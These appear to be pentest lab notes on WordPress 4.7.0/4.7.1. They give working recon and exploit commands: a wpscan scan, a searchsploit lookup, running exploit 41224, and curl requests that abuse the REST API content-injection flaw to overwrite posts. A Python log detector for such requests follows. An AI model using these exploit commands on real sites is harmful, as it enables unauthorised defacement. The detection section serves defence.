WordPress
Use curl to read the WordPress version from the generator tag
curl -s http://www.test.com/wordpress/ | grep generator
Use wpscan to run a vulnerability scan against the WordPress site
wpscan --no-update --url http://www.test.com/wordpress/ | grep Title
Use searchsploit to look up the WordPress version of the site
searchsploit wordpress 4.7.1
# Review exploit
searchsploit 41224 --examine
# or
cat /opt/exploitdb/exploits/linux/webapps/41224.rb
# Run the exploit (it could be Python or Ruby)
ruby /opt/exploitdb/exploits/linux/webapps/41224.rb
curl --data "id=4xxxxx&title=PWNED&content=Epic PWNAGE" http://www.sec542.org/wordpress/index.php/wp-json/wp/v2/posts/4
Curl exploit for WordPress 4.7.0/4.7.1 Content Injection
Change id=5 and the ID at the end of the URL to match a post ID returned when you run
curl http://www.test.com/wordpress/wp-json/wp/v2/posts
The command below will modify that post. This can also be done via Atom: https://blog.websecurify.com/2017/02/hacking-wordpress-4-7-0-1.html
curl --data "id=5xxxxx&title=HACKED&content=THIS SITE IS EXPLOITABLE" http://www.test.com/wordpress/index.php/wp-json/wp/v2/posts/5
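For the detection side of the request above, an added example (not part of the original notes) that flags write requests to the posts route whose id parameter differs from the numeric ID in the URL, as id=5xxxxx does. The tab-separated record format, the function names and the sample lines are constructed for illustration and assume a log source that captures request bodies.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Route used by the curl commands above: .../wp-json/wp/v2/posts/<numeric id>
POST_ROUTE = re.compile(r"/wp-json/wp/v2/posts/([0-9]+)/?$")
WRITE_METHODS = {"POST", "PUT", "PATCH"}

def id_params(query, body):
    """Collect every 'id' value sent in the query string, a form body or a JSON body."""
    values = parse_qs(query, keep_blank_values=True).get("id", [])
    if body.lstrip().startswith("{"):
        try:
            doc = json.loads(body)
            if "id" in doc:
                values.append(str(doc["id"]))
        except ValueError:
            pass  # malformed JSON: nothing to extract
    else:
        values += parse_qs(body, keep_blank_values=True).get("id", [])
    return values

def suspicious_id(method, uri, body=""):
    """Return the first id value that does not equal the numeric route id, else None."""
    parts = urlsplit(uri)
    route = POST_ROUTE.search(parts.path)
    if method.upper() not in WRITE_METHODS or not route:
        return None
    for value in id_params(parts.query, body):
        if value != route.group(1):
            return value
    return None

def scan(lines):
    """Return (line number, URI, id value) per flagged record: METHOD<TAB>URI<TAB>BODY."""
    hits = []
    for number, line in enumerate(lines, 1):
        method, uri, body = (line.rstrip("\n").split("\t", 2) + ["", ""])[:3]
        bad = suspicious_id(method, uri, body)
        if bad is not None:
            hits.append((number, uri, bad))
    return hits

# Constructed sample records (not real traffic).
SAMPLE = [
    "GET\t/wordpress/wp-json/wp/v2/posts\t",
    "POST\t/wordpress/index.php/wp-json/wp/v2/posts/5\tid=5xxxxx&title=HACKED&content=THIS SITE IS EXPLOITABLE",
    "POST\t/wordpress/wp-json/wp/v2/posts/5\ttitle=Weekly+update&content=hello",
    "POST\t/wordpress/wp-json/wp/v2/posts/5?id=7\t",
    'PUT\t/wordpress/wp-json/wp/v2/posts/5\t{"id": 5, "title": "ok"}',
]
```

Legitimate clients rarely send an id parameter alongside the route ID, so any hit from scan(SAMPLE) style matching is worth reviewing together with the site's WordPress version.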